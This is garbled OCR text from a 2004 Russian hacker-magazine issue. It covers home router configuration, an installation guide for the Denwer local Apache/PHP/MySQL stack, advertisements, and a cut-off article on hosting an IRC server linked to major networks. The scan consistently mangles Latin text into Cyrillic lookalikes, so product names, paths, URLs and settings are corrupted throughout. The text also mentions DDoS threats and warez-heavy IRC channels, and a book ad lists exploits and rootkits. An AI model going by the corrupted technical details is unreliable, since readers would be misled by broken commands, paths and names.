пароль на доступ к услуге, чтобы 
сосед Вася не смог получить халяв- 
ный нет за твой счет. Последнее, 
что нужно сделать в случае с марш- 
рутизатором 0-1_іпк ОІ-824ѴІІР+, - 
это перезапустить систему, что и 
производится нажатием кнопки 
«Везіагі» в мастере. 

Ж Ш0Г2 

Настройка сетевых параметров 
компьютера. Итак, вроде основные 
рабочие параметры маршрутизатора 



заданы, теперь проверим работос- 
пособность сети. Сделать это можно 
следующим образом: подключаем 
А08І_- модем к порту Ш\І на роутере 
(у маршрутизатора для выхода во 
внешний мир предназначен специ- 
альный разъем). В сетевых же наст- 
ройках указываем любой адрес 
компьютера, не равный адресу роу- 
тера (мы ведь помним, что он равен 
1 92. 1 68. 1 . 1 ) и из той же подсети 
(нам захотелось, чтобы компьютер 
обозначался как 1 92. 1 68. 1 . 1 1 ), по- 
том маску (255.255.255.0), не забыв 
указать в качестве (Мешу наш 
маршрутизатор. А дальше пробуем 
что-либо скачать извне. Если полу- 
чилось, значит, дело за малым: 
окончательно настроить устройство 
и соединить всю сеть. 

^шогз 

Окончательная настройка маршрути- 
затора. И хотя сеть уже работает и 
можно настраивать рабочие компью- 



теры, стоит все же обратить внима- 
ние на некоторые параметры, не бро- 
сающиеся в глаза на первый взгляд. 

Беспроводная сеть. Как уже го- 
ворилось, даже если нет надобности 
в использовании ѴѴі-Рі, стоит хотя бы 
задать пароль на соединение и уста- 
новить ѴѴЕР-авторизацию в беспро- 
водной сети (раз уж полное отключе- 
ние антенны разработчики не предус- 
мотрели). Кстати говоря, и в этом 
случае полной гарантии в том, что 
кто-то не получит доступ к твоей ІАІ\І, 
нет, так что можно посоветовать либо 
отсоединить антенну, либо приобрес- 
ти устройство без этой примочки. 

ѴШІ. По умолчанию мастер ре- 
шил, что интернет-соединение у нас 
постоянное, но, к сожалению, про- 
вайдер думает по-другому (раз в 
сутки меняя внешний ІР-адрес прос- 
тым способом - сбросом соедине- 
ния). Поэтому активированная опция 
«Соппесі-оп-сіетапсі» (соединение 
по запросу) поможет восстановить 



контакт с глобальной Сетью при об- 
рыве соединения (это произойдет, 
как только любое сетевое устрой- 
ство запросит информацию извне). 

В случае же постоянного подключе- 
ния или желания проделывать эту 
операцию вручную существуют еще 
несколько настроек. 

ОіаІІІр. На рисунке 1 можно ви- 
деть дополнительный модем ОіаІІІр. 
Возникает законный вопрос: «А за- 
чем он, если есть высокоскоростное 
соединение широкополосного ти- 
па?». Ответ прост: для обеспечения 
резервного канала. Конечно, про- 
вайдер х08І_-доступа прикладывает 
все усилия для обеспечения ста- 
бильности и качества связи, но в 
жизни всякое бывает, и в самый от- 
ветственный момент может случить- 
ся так, что компьютеры нашей ма- 
ленькой сети окажутся отрезанными 
от внешнего мира. И тогда спасет 
хоть и медленное, но все же нужное 
соединение с интернетом. 

РНСР. Служит для автоматичес- 
кого распределения адресов 
компьютерам внутри сети (требу- 
ется нам при нежелании делать 
это вручную), также этот сервис 
поможет в случае, когда сетевые 
настройки ноутбука на работе 
предполагают динамическое расп- 
ределение адресов (тогда даже не 
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В таком случае можно 
гарантировать стабильность 
и безглючность работы сети. 



стоит задумываться о проблеме 
перенастройки). Как правило, нуж- 
но обозначить некий диапазон ад- 
ресов, из которых будет выдавать- 
ся один экземпляр в аренду каждо- 
му вновь прибывшему сетевому 
устройству (или же по истечении 
срока). Тут же присутствует воз- 
можность жесткой привязки МАО 
адреса к ІР (для обеспечения бо- 
лее безопасных подключений). 

Арріісаііоп. При наличии прило- 
жений, которые должны создавать 
некоторое количество подключений 
на несколько портов вовне (напри- 
мер, игры или всякие интернет-зво- 
нилки), потребуется настроить пара- 
метры для каждого из них, ведь в 
противном случае все они будут заб- 
локированы файрволом. Именно 
здесь и происходит это конфигуриро- 
вание, и, как правило, имеются уже 
заложенные в память настройки наи- 
более часто используемых сервисов в 
сети для упрощения этого процесса. 

РіІІегз. Если требуется ограничить 
кому-то доступ из локальной сети на 
внешние адреса или ІІПІ_ (например 
для запрета доступа к порноресур- 
сам), это делается именно здесь. При- 
чем нужно помнить, что это совсем не 



файрвол, а просто фильтр доступа, ко- 
торый умеет блокировать лишь на вы- 
соком протокольном уровне по ІР, 

ІІПЦ домену или МАС-адресу. 

РігеѵѵаІІ. Основной модуль за- 
щиты. От его правильного конфигу- 
рирования зависит самочувствие и 
нормальное функционирование се- 
ти, ведь при неправильной наст- 
ройке может случайно заблокиро- 
ваться доступ отовсюду и везде. 
Чтобы такого не случилось, нужно 
внимательно изучить документацию 
и определиться с тем, какие прави- 
ла имеют больший приоритет, а ка- 
кие меньший. У нашего роутера по 
умолчанию оказалась весьма при- 
ятная конфигурация - из локальной 
сети разрешалась любая актив- 
ность в сторону глобальной, тогда 
как обратная связь запрещалась 
вовсе. Причем очень интересной 



особенностью является возмож- 
ность работы различных правил по 
расписанию, то есть в отдельные 
дни (или часы) можно разре- 
шать/запрещать активность на ка- 
ких-либо портах и адресах. 

К сожалению, все настройки опи- 
сать невозможно (да это и не нужно, 
поскольку у разных моделей разных 
производителей роутеров они будут 
значительно различаться). Но стоит 
придерживаться таких правил: 

О. Если сервис не нужен, то его 
стоит отключить во избежание лиш- 
ней вычислительной нагрузки и про- 
никновения через возможные дыры 
в системе. 

О. Поступать согласно принципу 
«Все, что не разрешено, то запре- 
щено». В таком случае можно гаран- 
тировать стабильность и безглюч- 
ность работы сети. 



Ж Ш0Г4 

1 Соединение всех компонентов вое- 
дино. После полной и всеобъемлю- 
щей настройки всевозможных функ- 
ций роутера стоит присоединить все 
сетевые устройства к этой коробоч- 
ке и задать правильные адреса (или 
указать, что они определяются авто- 
матически, в случае с функциониро- 
ванием ОНСР-сервиса). Кстати гово- 
ря, обычно для настройки принт- 
сервера требуется установить кон- 
фигурационную программу на нас- 
тольный компьютер и уже оттуда 
создать нужное подключение. 

Л выводы 

Установив и наладив роутер, мож- 
но избавиться от головной боли с 
компьютером, который должен 
быть постоянно подключен к ин- 
тернету (а при старом раскладе 
имелась опасность взлома, пос- 
кольку адрес-то внешний). То есть 
немного потратившись на устрой- 
ство, называемое маршрутизато- 
ром, мы получаем в одном флако- 
не многофункциональный девайс, 
призванный стать центральной 
объединяющей частью всей до- 
машней сети. ЗС 
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ы пишешь скрипты для своего сайта? Нет? Нужно ведь ставить никсы, настраивать веб-сервер, РегІ, РНР, базы данных. Придется 
читать дпиннющие, запутанные, порой противоречащие друг другу нануапы, попутно разбираться в тонкостях работы с напознако- 
иой операционной. Ужасно, правда? Я тебя понимаю. 

О веришь, что, скачав около 7 N6 из инета, через попчаса на своей машине ты будешь иметь полноценную среду дня разработки и отладки 
веб-скриптов? ОрасЬе, 881, ядро РегІ, РНР4 с 60 и Ну8Щ. Ну8Щ с поддержкой транзакций (шуоцігі-тах), рНрНуОгІтіп - полная система 
управления МуЗІЦ через НѴеЬ-интерфейс. Под ИІіпгІоііѵз. С виртуальными хостами и ЗепгітаіІ. Не веришь? Н зря! Читай! 



МПСТЕРСКПЯ ВЕБ-РПЗРПБОТЧИКП 30 1 5 МИНУТ 



Л 



А ЗНПКОМЫЕСЬ- ЭТО ДЕНВЕР! 

В се не просто, а очень просто. 

Денвер (Джентльменский На- 
бор ѴѴеЬ- Разработчика, 
Д.Н.ѴѴ.Р.) - это модульная сис- 
тема, позволяющая за несколь- 
ко шагов организовать целую 
лабораторию для веб-програм- 
миста. Ядро системы - базо- 
вый комплект. Оно весит всего чуть больше 
двух метров. Слить его можно по адресу 
ѵѵѵѵѵѵ.с1кІаЬ.ги/сІііскеп/ѵѵеЬ/сІі$/Ва$е. Щелкай по 
ехе'шнику. Он распакуется во временную 
директорию, и появится консольное окошко 
- процесс установки начался. Кстати, то, 
что ты видишь, - это уже результат работы 
РегІ. Инсталляшка написана именно на 
нем. Интерпретатор уже запущен. На твоей 
машине исполняется самый настоящий 
скрипт. Я же говорил, что все просто. 

Жми Епіег, как он просит. Надо выб- 
рать установочный каталог. Нет-нет, ника- 
ких Ргодгат Рііез! Рекомендуется созда- 
вать рабочий каталог Денвера в корне 
диска, на котором будет стоять система (у 
меня это сІДсІепѵег), потому что установ- 
щики дополнительных модулей сами ищут 
его по всем дискам, но только в дирах 
первого уровня. Это сэкономит потом 



твое время. Деинсталляция системы, к 
слову, сводится к простому удалению 
этой директории. Итак, каталог создан и 
доступен нам через новый виртуальный 
диск. Для этого не нужно ставить никаких 
дополнительных программ, используется 
стандартная утилита зиЬзІ из дистрибути- 



ва винды. Для имени диска выбирай букву 
ближе к концу алфавита - так меньше ве- 
роятности, что это спровоцирует конф- 
ликт. По умолчанию предлагается «2:». 
Если эта буква свободна - соглашайся. 
Еще пара нажатий Епіег, и пошел процесс 
копирования нужных файлов. 



На твоей машине исполняется самый 
настоящий скрипт. 
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Директории на винчестере определяют имена вирту- 
альных хостов 



Теперь нам нужно выбрать режим запуска 
Денвера. Их два, и отличаются они тем, как 
система будет обращаться с виртуальным 
диском: будет ли он создаваться при старте 
ОС и оставаться до конца сеанса, либо будет 
существовать только во время работы Ден- 
вера и убиваться после ее завершения. Пер- 
вый вариант позволяет работать с перлом из 
командной строки, не запуская Денвер. Зато 
второй освободит имя диска, когда ты оста- 
новишь работу серверов. Я выбрал второй. 

Последнее, что спросит у тебя инсталля- 
тор: создавать ли иконки на рабочем столе 
для запуска, рестарта и остановки серверов. 
Создавать, конечно! 

Все. На этом установка закончена! 

^ ЧТО 9 НОС ПОПУЧИПОСЬ 

Щелкай на «Зіаіі зегѵегз». В консольных 
окошках отработает стартовый скрипт, и в 
трее появится знаменитое перышко - лого- 
тип Арасііе. Запускай браузер и пиши 
Шр://ІосаІІіозІ. 

Перед тобой открылась страничка, сгене- 
рированная твоим только что запущенным 



сервером. С рекламой - куда уж без нее. Ну 
ладно, дело не в этом. Смотрим чуть ниже. 
Там расположены ссылки, позволяющие про- 
тестировать работу нашей системы, л инк на 
рМрМуАсІтіп - администраторский инстру- 
мент управления базой - и маленький скрип- 
тик для быстрого добавления нового пользо- 
вателя в базу данных. 

Л ОСМПТРИВПЕМ ВПОДЕНИЯ 

Давай посмотрим, что у нас есть на только 
что созданном виртуальном диске и каково 
назначение этих папок и файлов. В корне 
диска четыре директории: изг, Дпр, Моте, 
еіс - и файлик ридми (но тебе же будет лень 
его читать, правда?). 

О. еіс. В нем находятся три программы 
старта и стопа серверов (ярлыки на них ле- 
жат на десктопе), скрипты на РегІ и инфор- 
мация о конфигурации системы (в каком по- 
рядке и с какими параметрами будут запу- 
щены те или иные сервисы). 

О. Йоте. Тут находятся виртуальные 
хосты нашего сервера и все их содержимое. 
Позже я подробнее остановлюсь на этом. 

Ѳ. Ітр. Временный каталог. Нам с тобой 
он прежде всего будет интересен вот чем: 
помнишь, я говорил, что в системе есть 
ЗепсІтаіІ? На самом деле я немножко слука- 
вил. Сендмайл здесь неполноценный, отпра- 
вить письмо через него ты не сможешь, да 
Денвер и не предназначен для этого. Тем не 
менее, скрипты, требующие отсылки почты 
для своей работы, вполне удовлетворятся и 
этой урезанной версией. Все письма, отсы- 
лаемые скриптами, сваливаются в 
Іетр\!зепсІтаіІ. Посмотреть их содержимое 
можно как непосредственно с диска, так и по 
ссылке Шр://ІосаІ!іо$і/Те$і/$епсІпаіІ/іпсІех.рІір. Там 
же можно протестировать работу ЗепсІтаіІ. 

О. изг. Возможно, самый важный ката- 
лог, если такое выражение вообще допус- 
тимо. В нем находятся исполняемые фай- 
лы интерпретаторов РНР и РегІ, веб-сер- 
вера, базы данных, а также ЗепсІтаіІ. Наи- 
больший интерес представляет домашний 
каталог Апача (изг\ІосаІ\арасМе). В папке 
Ып лежат две утилиты: аЬ.ехе (АрасИе 
ВепсМ) для проверки производительности 
веб-сервера и МраззѵѵсІ.ехе для создания 
аутентификационных файлов пользовате- 
лей. В дире сопТ расположены три главных 
настроечных файла Апача. Это ІіМрсІ.сопІ - 
основной конфигурационный файл, 
ѵііозіз.сопТ - описание виртуальных хостов 
(генерируется автоматически при старте 
системы), а также тіте.іурез - правила 
обработки данных того или иного типа, ко- 
торые посылаются сервером. Настройки 
РНР находятся в файле 
\изг\ІосаІ\рИр\рИр.іпі. Конфигурация 
МуЗОЪ лежит в \изг\ІосаІ\туздІ\ту.спк 



Файловая структура денверо 

В иртуальный диск содержит файловую структуру (не систему, 
разумеется, а именно структуру - расположение и назначе- 
ние папок и файлов в них), характерную для никсов. Это очень 
удобно, потому что позволит тебе быстро освоиться и запом- 
нить, где нужно искать тот или иной файл на настоящем никсо- 
вом сервере. 




В НОМЕРЕ: 

$ітз 2 

Передовые технологии 
человеководства 

Зііепі НіІІ 4: ТЬе Поопл 

Съемные кошмары в 
провинциальной квартире. 



Они о нас 

Подружки считают нас 
сумасшедшими? Или милыми? 







А Если не работа- 
ют домены второго 
уровня либо вооб- 
ще не открывается 
ничего, кроме 
ІосаІІіозІ, то про- 
верь настройки 
прокси-сервера 
в браузере. 




л Денвер обладает 
полезным свой- 
ством. Он умеет 
комментировать 
ошибки, происхо- 
дящие на сервере, 
и выдавать возмож- 
ные причины их 
возникновения. Ча- 
ще всего истинные. 



ЧЕЕ> 

а На нашем диске 
мы выложили дист- 
рибутив Денвера - 
пользуйся! ;) 



А ЗППУСКПЕМ 



Виртуальные хосты - очень удобный меха- 
низм. Благодаря ему можно на одной физи- 
ческой машине с одним ІР-адресом содер- 
жать сразу несколько сайтов, соответствую- 
щих разным доменным именам. Несмотря 
на то, что запросы физически шлются на 
один и тот же сервер, Арасііе, анализируя 
заголовок запроса (а именно поле Нозі), по- 
нимает, какой именно из серверов нужен 
пользователю. Денвер позволяет добавить 
или удалить новый виртуальный хост за два 
шага. Чтобы добавить новый хост, нужно 
создать в каталоге \іюте подкаталог с име- 
нем создаваемого хоста (например 
тісго$оГС.сот), затем внутри него сделать ката- 
лог шт. В этот каталог нужно помещать 
файлы, которые должны быть доступны по 
запросу к хосту шѵшісгозоіі.соп. Для создания 
поддомена нужно сделать каталог с именем 
этого поддомена. 

На картинке показано, какие домены 
и поддомены есть на моей машине. Это 
ѵшѵшесііка.ги, ѵѵѵѵѵѵМііегу.ги, хакерМііегу.ги, 
ІосаІІіозі, зиЬсІотаіп.ІосаІііозі, ѵшѵѵ.тісгозоіі.сот, 
іеаіііегу.тісгозоіі.сот. Кроме этого, видны еще 
два тестовых хоста (іезіі .ш и іезі2.ги), 
создаваемых автоматически при установке 
Денвера. Если тебе нужно создать вирту- 
альный хост с доменом более высокого 
уровня, можно воспользоваться вот такой 
конструкцией: 

\ііоте\ѵегу . Іопд .ботаіп . пате . ги\ѵѵѵѵѵѵ2 . 
Чтобы изменения, внесенные тобой в 
структуру каталогов, обрели силу, нужно 
перезапустить серверы. Надо сказать, из- 
за моей ламучести у меня не каждый раз 
получалось заставить заработать только 
что созданные домены с помощью ярлыка 
«Везіагі зегѵегз». Зато полная остановка и 
повторный запуск решили проблемы. Каж- 
дый раз при запуске Денвер анализирует 
положение вещей в каталоге \іюте и на 
основе этого изменяет файл 
%ѴѴІМОІВ%\зузіет32\сІгіѵег5\еіс\Іі05і5 (для 
ѴѴіпсІоѵѵз 95/98 - %Ш0ІВ%\іюзі5), кото- 
рый содержит данные об ІР-адресах неко- 
торых хостов. Данные из этого файла наи- 
более приоритетны для виндовой службы 
□N3, поэтому каждое его изменение отра- 
жается на том, как будут резол ьвиться 
имена хостов. Да, если тебе нужно, чтобы 
какие-то твои сайты были доступны по ІР- 
адресу, поступай таким же образом: 
\ііоте\1 92. 1 68. 1 1 1 . 1 1 1 \шт. Последний 
каталог (шт) необходим. 



№1 Ш030ГШМ 

НО своей иошине, 
ипи виртуяпьны^ кі 
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ДЕНВЕР М ВНЕШНИЕ 30ПР0СЫ 

Д енвер предназначен исключительно для разработки и отладки 
веб-скриптов. Использовать его в качестве настоящего серве- 
ра, доступного извне, разработчики категорически не рекоменду- 
ют. Но если все же приспичило, и ты понимаешь весь риск, то для 
того чтобы разрешить Апачу отвечать на внешние (то есть не от 
ІосаІІіозі) запросы, нужно раскомментировать в /изг/іосаі/арасііе/ 
сопі/ІііірсІ.сопістроку ВіпсІАсІсІгезз *. Остальные строки, начинаю- 
щиеся с ВіпсІАсІсІгезз, надо закомментировать. 



^ ОДМИНИНСИКВЕП 

Сиквел - именно так правильно произносит- 
ся аббревиатура ЗОБ. С Денвером поставля- 
ется Му80І_. Первое, что тебе придется сде- 
лать, - добавить нового пользователя базы. 
Это можно сделать здесь: 
Іііір://1оса1ііозі/ас1с1тизег.ріір. Благодаря этой за- 
мечательной штуке, можно на локальной ма- 
шине полностью воссоздать те условия, в 
которых будет работать твой скрипт на ре- 
альном хосте. Ведь твой провайдер вряд ли 
будет долго задумываться над тем, какой 
именно логин и пароль тебе выдать, и ты 
получишь что-то вроде изег231 :5Мск58іѵ. 

Один из самых мощных инструментов 
администрирования БД - ріірМуАсІтіп. Он 
доступен для тебя по адресу 
іііір://ІосаІііо$і/ріірМуАсІтіп. Описать все его 
возможности здесь нереально: он спосо- 
бен решить практически любую задачу, 
связанную с отладкой базы. С его по- 
мощью ты сможешь создавать и модифи- 
цировать базы и таблицы, видеть состоя- 
ние, загруженность, внутренние процессы 
в БД, и, пожалуй самое ценное, бэкап и 
восстановление баз. 

Уверен, ты сам разберешься с функциями 
и интерфейсом ріірМуАсІтіп. Он русскоязыч- 
ный, все подробно объясняется. 

А РПСШИРЯЕН ВОЗМОЖНОСТИ 

Все, о чем я писал выше, реализуется базо- 
вым комплектом. И тех услуг, которые он 
предоставляет, скорее всего, будет доста- 
точно для создания/установки/отладки 
скриптов средней сложности. 

Но может случиться, что становятся нуж- 
ны и не реализованные в базовом комплекте 
функции. В этом случае на помощь приходят 



расширения Денвера. На момент написания 
статьи официальный сайт предлагал следую- 
щие дополнительные модули: 

- Полная версия АсііѵеРегІ, включающая в 
себя стандартные библиотеки, систему инс- 
талляции модулей АсііѵеЗіаіе РРМ, дополни- 
тельные модули плюс ССІ::ѴѴеЫп и 
СЭІ::ѴѴеЬОиі. 

- Полная версия Арасііе/1 .3.27 с динами- 
ческими модулями. 

- Опять-таки полные версии интерпрета- 
торов РНРЗ, РНР4 и даже РНР5. 

- Раггоі - виртуальная машина Регіб. 

- Рагзег 3. Детище Артемия Лебедева - 
технология создания сайтов. Чуть сложнее 
обычного НТМЦ но намного проще любого 
языка веб-программирования. 

- Пакеты документации к основным и до- 
полнительным модулям. Ценны сами по себе 
как хорошо переведенные на русский язык 
мануалы. 

Кроме этого, доступны две альтернатив- 
ные версии базового комплекта. Одна из них 
уже содержит в себе Рагзег 3. Думаю, если 
ты не экономишь на нескольких мегабайтах 
дискового пространства, имеет смысл уста- 
навливать именно этот вариант. Вторая вер- 
сия - минималистическая - базовый комп- 
лект на дискете. 

^ФИН 

Я надеюсь, теперь ты понимаешь, что в соз- 
дании удобной среды веб-разработчика нет 
ничего сложного. Дело за малым - начинай 
творить. Так хочется, чтобы результаты тру- 
да наших программистов светились в топах 
на боѵѵпіоасі -сайтах и не звучали в рассылках 
баг-трака. Удачи. X 





А8ІІ8 БашеГасе Ыѵе 

Решение для аудио/видео связи в режиме реального времени 



А8І1Б ѴМео8есигі1у Опііпе 

Создание собственной системы безопасности и видеонаблюдения 



А8І18 0п8сгеепПізрІау 

Позволяет изменять различные настройки экрана, не покидая игру 



А8І18 8таг1СооІіпу 

Динамически настраивает скорость кулера 
видеокарты для бесшумной работы 

А8І18 НурегОгіѵе 

Обеспечивает 3 способа динамического разгона видеокарты 
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Тел: (095) 974-3210 
ѵѵѵѵѵѵ.рігіі.ги 



Тел: (095) 105-0700 
ѵѵѵѵѵѵ.оісіі.ги 




Тел: (095) 995-2575 
ѵѵѵѵѵѵ.осз.ги 



ин ЛІРІТЕВ. 

Тел: (095) 708-22 59 
Факс: (095) 708-2094 



ііШик 

Тел: (095) 745-2999 
ѵѵѵѵѵѵ.сіііііпк.ги 




Тел: (095) 269-1776 
ѵѵѵѵѵѵ.сіізіі.ги 



Тел: (095) 799-5398 
ѵѵѵѵѵѵ.іігагсі.ги 
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I ЗМеК (зШехігеаІ.хакерлиІ 



/ КПКЕР/№1 0(70)/2004 



днажды канал К на ОШпеІ’е закрыли. Прости пришла тетя ІПСпр, гавкнула пару фраз, нажала пару кнопочек, и канал ушел в даун... 
Мы злились, рвали и метали дп абсолютнпй развязки спбственных пупкпв. Сочувствующие обещали устроить админам 
массированный ППо8, заполонить сеть клонами, держать сервисы в дауне неделями... Стопъ силен был гнев! Однако оглядываясь 
назад, понимаешь, что затраченные усилия мпжно было потратить на установку своего собственного сервера, сбивку грамотной команды 
технарей, оформление линковки (присоединения) к выбранной сети. 



СПОСОБ стать КОРОЛЕМ ікс 



А п смысл в ЧЕМ? 

рилинковав свое добро, ты ав- 
томатом становишься сервер- 
админом и можешь раздавать 
почетные звания ІВСор’ов сво- 
им подопечным. Разве не круто 
иметь в ѵѵііоіз’е фразу «Ѵазуа із 
ІВСор», вызывающую респект 
профессионалов и наводящую 
страх на виртуальных гопников? Это очень 
круто и, главное, окажется вполне доступно 
тебе после прочтения данного труда. 

А куда полоться? 

Наша цель - стать королями ІВС, а вовсе не 
потерять здоровье при развитии некой конк- 
ретной сетки. Так что наша проблема лишь 
в выборе королевства. 

ЕМЕШІ8-НЕЕ ДЕШОПК) 

ѵш.еМ.огд 

Старейшая ІВС-сеть, обладающая хакерс- 
ким ореолом. Сложно найти хак/варез- груп- 
пу, которая не держала бы здесь свой чан. 
Престиж сети неоспорим, оттого и желаю- 
щих прилинковаться хватает. Самые свежие 
требования к линкуемому добру и форма за- 
явы находятся здесь: шѵш-еМсот/пег$егѵег- 
диИеІіпе$-ЕУ. Глава комитета сидит в Швеции, 



а обработкой канадских и американских сер- 
веров занимается другое региональное уп- 
равление. Как водится, требуют разреше- 
ния/одобрения на установку сервера не 
только от админа выбранной машины, но и 
от начальника всей сети. Понятное дело, 
сервер должен быть выделенным - дедиком 
(бесіісаіесі). Виртуалки к рассмотрению не 
принимаются. Как и все, ЕРпеІ хочет делать 
любовь лишь с опытными админами. Прак- 
тика показывает, что требования данной се- 
ти особенно высоки к профессионализму 
зегѵ-асіт’а. РгееВВО - стандарт сети де-фак- 
то, хотя история помнит исключения. Нович- 
ку же рассчитывать на поблажки совсем не 
стоит. К железу требования довольно скром- 
ные: 256 Мб оперативки, которые крутятся 
на базе Р2/3/4. Публичных сервисов быть не 
должно, лишь базовые темы из ядра. Табу 
на іпеМ, синхронизация времени может идти 
по пШе, процесс зупс’а должен произво- 
диться ежедневно. ХпірсІ отдыхает, потому 
что стандарты секьюрности не позволяют. 

Сеть заинтересована в подключении ново- 
го сервера из России, особенно после того, 
как прежний ігс.гі.ги был делинкован. Новый 
сервер должен держать минимум 300-400 
юзеров. Существует политика ограниченного 
доступа, когда на ряд ігс-серваков могут 




подрубиться лишь избранные. К примеру, 
туда подключаются студенты универа, в чьей 
сети стоит машина. В среднем, I ВС-сервер 
на ЕРпеІ потребляет 1 00 СЬ трафика. К при- 
меру, данная цифра относится к серверу 
ігс.еЕпеГпІ, который сейчас держит чуть боль- 
ше 3000 юзеров. 

ШЕШТ 

ѵѵѵш.иікіегпеі.огд 

Расходы трафика типичны для большин- 
ства крупных сетей, исключая ряд варезных, 
вроде описанного ниже Вігоп’а. 

Первые ассоциации с ипсіег - ипсіег- 
дгоипсі, разная вкусная нелегальщина. Отцы 
сети всячески открещиваются, однако на 
самом деле поддерживают представленные 
на сети варезные каналы с открытым досту- 
пом. В отличие от ЕРпеГа, характерного от- 
сутствием сервисов, здесь крутятся серви- 
сы аж с 1995-го. На каждый канал можно 
загнать сервис-бота с очень симпатичным 
нашему журналу именем X. Итогом стано- 
вится более дружелюбная атмосфера сети, 
меньшее число тэйковеров. 

Сеть стоит на серваках марки ігси 
(ѵѵѵѵѵѵ.собег-сот.ипсіегпеіогд), которая разрабаты- 
вается местными ІІпбегпеГовскими кодера- 
ми. Начинание некоммерческое, оттого ап- 
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дейты иногда припаздывают, хотя летальные 
баги залатываются оперативно. 

Изначально сеть позиционировалась как 
свойская, абсолютно открытая для новых 
людей. Увы, сие лишь прошлое, и сейчас 
прилинковаться к Ундернету - еще та инт- 
рижка. Помимо обладания сервером и ле- 
гальным доступом к интернет-соске, комитет 
по линковке требует заявления и от админи- 
страции прова. Требования по железу иден- 
тичны ефнетовским, но с добавкой логично- 
го пожелания 512 мозговых метров. Новые 
ігсор’ы перед вступлением в законный брак 
с сетью проходят инструктаж от отцов. 

Вся официальная ботва находится на 
ѵѵѵѵѵѵ.гоиііпд-сот.ипсіегпеі.огд. 



ВІ20Ы 

| отт.гі2оп.пе1 

Самая молодая из действительно попу- 
лярных сетей. Популярность поддерживает- 
ся размещением доброй сотни варезных ка- 
налов, где можно выкачать свежайшие 
фильмы, музыку и софт. На отдельных ка- 
налах отвисает до 4000 человек. За два го- 
да существования сети успели собраться 
почти 20 серваков. 

Если верить начальству отдела по линков- 
ке, подключение российской машины крайне 
желанно. Однако их СеоЭМЗ (система по ро- 
угингу новых юзеров - кого на какой сервер 
бросить в зависимости от географии юзера) 
будет к нам роутить в основном азиатов и 
героев из Восточный Европы. Проблема се- 
ти - высокий трафик, нагоняемый густонасе- 
ленными каналами. От анонсов вареза, кото- 
рые идут 24 часа в сутки, набегает до 400 
гигабайт трафика на каждый сервер при 
2000 юзерах на постоянке. 

Дружба с варезными сетями помогает по- 
лучить доступ ко всей элитарной свежатине, 
которая описывается в нашей эпохальной 
рубрике «І_еесН». Ряд профессиональных ва- 
резников, что тиражируют диски сотнями 
тысяч, по непроверенной информации, дер- 
жат здесь несколько сервантов. За это они 
получают ЕТР-аккаунты на быстрых серваках 
с эксклюзивом. 

Л ГДЕ БУДЕТ ЖИТЬ НОШ СЕРВЕР? 

Давай сразу определимся, что в российских 
условиях площадку под твой сервер вряд ли 
кто-то даст на халяву. Был опыт российского 
сервера ігс.гі.ги, который был прилинкован к 
ЕРпеЕ Потом получилось так, что провайдер 
решил отказаться от проекта, и сервер был 
делинкован в тот же час... Не прокатит и за- 
рубежная тема с установкой сервера в своем 
институте: редкий вуз возьмется за финан- 
сирование проекта, да и мало кто из рос- 
сийских учебных обителей располагает столь 
мощным интернет-каналом, какой требуется 
крупной зарубежной сети. 

Для установки я занялся активным поис- 
ком провайдера. Оказалось похоже на съем 
квартиры: в рекламе все очень вкусное и 
желанное - ставь сервер, плати копейки и 
наслаждайся. Более других впечатляло 
предложение «НЕОГРАНИЧЕННЫЙ ТРА- 
ФИК», обозначавшийся обманчивой рекла- 
мой почти как дармовой. После обзвона и 
общения с менеджерами получалось, что 
он, конечно же, неограниченный, но есть 
«ряд маленьких условий». По этим услови- 
ям ну никак не прокатывало прилинковать 



от них свою машину к тому же Нігоп’у, чре- 
ватому четырьмястами гигабайтами в ме- 
сяц. Они говорили, что российского трафи- 
ка должно быть столько же, сколько и за- 
падного. На фига мне российский трафик? 

У меня же западники будут занимать 95% 
всего потока! В моем случае они хотели 
доплаты. Снова куча условий, непонятность 
которых наводила на меня непомерный 
страх: продадут меня в марсианский бор- 
дель отрабатывать огромный долг к концу 
месяца :). Было понятно, что мне нужен 
пров без разбиения на Запад и Россию, по- 
тому что при бесплатности/дешевизне тра- 
фика на Родине неизбежно поднимается 
ставка за работу с Западом. 

Я уже имел удачный опыт работы с кол- 
локейшеном шша$іак.ги и не стал «от бобра 
добра искать». Т.к. подключаться мы соби- 
рались к одной из лидирующих мировых 
ІВС-сетей, надо было, чтобы все прошло 
стабильно, без приключений. Вложение се- 
бя окупило, и наш триальный 45-дневный 
срок прошел на ура. Да что там вложение! 
Когда я стал искать площадку на 
м.ргоѵісіегш, первый же потребовал $200 
за начальное подключение! Это явно не впи- 
сывалось в мой баланс при потраченных у 
«Мастака» $30. 

Также я выбирал провайдера, чтобы по- 
мимо коллокейшена был доступен и бесіі- 
саіеб, если вдруг я потом буду расширяться 
в выбранной I ВС-сети. Ставить собствен- 
ный хаб, на покупку которого денег уже не 
хватало. Я отыскал целую кучу свободных 
машин в гермозоне «Мастака», отмеченной 
на картинке ниже. 

Железо - очень хорошо, но нужны и люди, 
которые придут на помощь в случае проб- 
лем. Большинство провайдеров предлагает 
«администрирование Вашего сервера». Од- 
нако опыт коллег показывает, что подобным 
казенным администрированием далеко не 
всегда занимаются профессионалы. С моим 
же выбором я мог доверить свой прежний 
проект местным админам. 

В случае установки ІВСЭ для крупной сети 
проблема работников прова становится осо- 
бенно актуальна, т.к. недоброжелатели по- 
рой устраивают провокации против зегѵег- 
абтіп’ов конкретного I ВС-серванта: пишут 
аЬизе’ы в адрес владельцев соііосайоп’а, 
описывая все мировое зло, которое творится 
на сервере. Иногда подобные задвиги ока- 
зываются успешными, и серверы снимают с 




УЖЕ В ПРОДАЖЕ 




Неприступный *піх 



Взлом и защита 
к ІШІХ-систем I 



• Архитектура ІШІХ 

• Эксплоиты 

• Бэкдоры, руткиты, 
стелс-модули 

• Примеры реальных взломов 

• Обход файрволов 

• Взлом БД 

• Хитрый тюнинг и 
грамотная защита 

•ЮЗ 



• Нопеуроі 



ПЛЮС: 

• Обзор боевого софта и 
еще 20 способов 
взломать *піх! 




Уникальная информация 
и софт на прилагаемом СО! 
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| МОТР - сообщение дня 



Понятное дело, что ІКС для них - 
одно из наиболее сонных и 
эффективных мест рекламы. 



порта. Со мной лично происходило подоб- 
ное, но «Мастак» тщательно расследовал 
проблему и посылал провокаторов на ][. 
Читать журнал X и уму-разуму набираться :). 

А КОК ПОИМЕТЬ ПИНКОВКУ 
Н0Х0ПЯВУ? 

Есть качественные руки админа, контакты с 
отцами желанной сети, возможность прово- 
дить время за мониторингом сети и наведе- 
нием порядка, умение сдержать свой гнев 
(не злоупотреблять командой /кіІІ :)). Чего 
же не хватает? Да все того же, отчего прихо- 
